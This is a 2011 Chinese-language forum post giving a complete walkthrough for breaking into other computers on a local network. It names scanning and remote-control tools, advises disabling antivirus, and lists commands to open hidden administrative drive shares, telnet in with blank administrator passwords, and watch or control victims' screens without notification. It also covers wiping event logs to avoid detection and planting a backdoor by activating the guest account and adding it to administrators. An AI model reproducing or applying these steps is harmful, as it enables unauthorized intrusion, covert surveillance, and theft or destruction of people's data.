南瓜园

 找回密码
 注册
查看: 1187|回复: 0

局域网入侵完整版技术

[复制链接]
发表于 2011-3-28 17:49:25 | 显示全部楼层 |阅读模式
局域网入侵完整版 局域网入侵技术 局域网入侵完技巧

入侵工具:
  一般要用到三個:NTscan變態掃瞄器,Recton--D賀免殺專用版,DameWare迷你中文版 4.5. (前兩個工具殺毒軟件都會報毒,建議將殺毒軟件實時防毒暫時關掉,並將這兩個軟件的壓縮包加密,防止被殺。)
  入侵步驟:
  1.使用「NTscan變態掃瞄器」,在IP處填上要掃瞄的IP範圍,選擇「WMI掃瞄」方式,按「開始」後就等掃瞄結果了。
  2.使用「Recton--D賀免殺專用版」
  選擇「CMD命令」項,在「CMD:」中輸入「net share C$=C:\」,即可開啟遠程主機的C盤共享,以此將「C」換成D,E,F等,即可開啟D盤,E盤,F盤等的共享,這種共享方式隱蔽性很高,而且是完全共享,在對方主機上不會出現一隻手托住盤的共享標誌,然後在地址欄中輸入「\\對方IP\C$」,即可進入對方C盤。
  選擇「Telnet」項,在「遠程主機」中輸入剛才掃瞄到的一個IP,遠程啟動Telnet服務,成功後在「CMD選項」中,執行命令:「net share ipc$」,接著執行:「net share admin$」,最後執行「net use \\***.***.***.***\IPC$ 」「 /user:administrator」在*處填入你入侵的主機IP。
  3.使用「DameWare迷你中文版 4.5」,安裝後點「DameWare Mini Remote Control」,在「幫助」項中選擇激活產品,輸入註冊信息,成功註冊後,進入「遠程連接」窗口,在「主機」處填入IP地址,點「設置」,在「服務安裝選項」中點「編輯」後,在「通知對話框」中去掉「連接時通知」,在「附加設置」中全都不選,在「用戶選項」中去掉「啟用用戶選項菜單」。設置完成好後,就可點「連接」,在彈出的對話框中點「確定」後,成功後你就可以像操作自己機子一樣控制別人電腦了,當然你也可以只選擇監視對方屏幕。 注意:如果不註冊的話,在對方主機上會彈出一個對話框,暴露你的身份。
  入侵步驟補充:
  1.在以上第2步中,遠程啟動Telnet服務可以通過「我的電腦-管理-連接到另一台計算機-輸入IP-服務和應用程序-服務-將telnet改為手動-啟動」完成。
  2.Recton--D賀免殺專用版還有其他功能,在「進程」項中,可以查看遠程主機的進程,並可任意結束其中進程;在「共享」項中,可以創建共享,我常用的是創建C$,D$,E$,F$,共享路徑分別對應C:\,D:\等,共享好後在地址欄中輸入「\\IP\C$」,進入對方C盤,你就可以隨意複製刪除裡面的東西了,而且這種共享對方機子盤符上不會顯示共享圖標,也就不會被發現,弄完後最好還是把共享給關掉。最後選「日誌」,清除所有日誌,不留痕跡。這個軟件會被殺毒軟件當作病毒殺掉,用它時須將實時防毒關掉。
  3.上面的共享可通過CMD(程序-附件-命令提示符)完成,首先「telnet IP」,telnet上去,鍵入y後輸入的用戶名「administrator」,密碼為空, 進入後,開共享用net share命令,共享C$(即C盤):「net share C$=C:」,共享system文件夾:「net share c=c:\winnt\system32」,共享IPC$用:「net share IPC$」等,最後是關閉共享,關閉C盤共享:「net share C$ /del」。
  4.為方便下次入侵,可以設置後門, 查看用戶:「net user」,激活guest用戶
  「net user guest /active:yes」,更改guest的密碼為poco:「net user guest poco」,把guest的權限提升為管理員權限:「net localgroup administrators guest /add」。
  5.telnet命令(DOS命令)很多,可去網上查找它的命令,常用的有:查看D盤文件:「」dir d:\「,查看C盤program file文件夾:」dir c:\PROGRA~1\;「,60秒倒記時關機:」shutdown -s -t 60「
  補充說明:
  1.net use錯誤原因解決:
  (1)。」發生系統錯誤 1326。 登錄失敗: 未知的用戶名或錯誤密碼。「
  在遠程機的」控制面板-文件夾選項-查看-簡單的文件共享「,去掉選取,然後再嘗試連接。簡單文件共享會把網絡連接權限都歸為 guest連接,是無法訪問C$等管理共享的。
  (2)」發生系統錯誤 1327。 登陸失敗:用戶帳戶限制。可能的原因包括不允許空密碼,登陸時間限制,或強制的策略限。「在遠程機的」控制面板-管理工具-本地安全策略-安全選項-用戶權限「指派裡,禁用」空密碼用戶只能進行控制台登陸「.
  (3)」//IP/c$「時提示找不到網絡途徑。在」網絡和撥號連接「中」本地連接「中選取」Internet協議(TCP/IP)「屬性,進入」高級TCP/IP設置「選」WINS設置「裡面有一項」啟用TCP/IP的NETBIOS「.
您需要登录后才可以回帖 登录 | 注册

本版积分规则

请大家牢记南瓜园网址 www.nan2008.com

QQ|小黑屋|手机版|Archiver|南瓜园

GMT+8, 2024-12-27 15:35 , Processed in 0.121022 second(s), 19 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表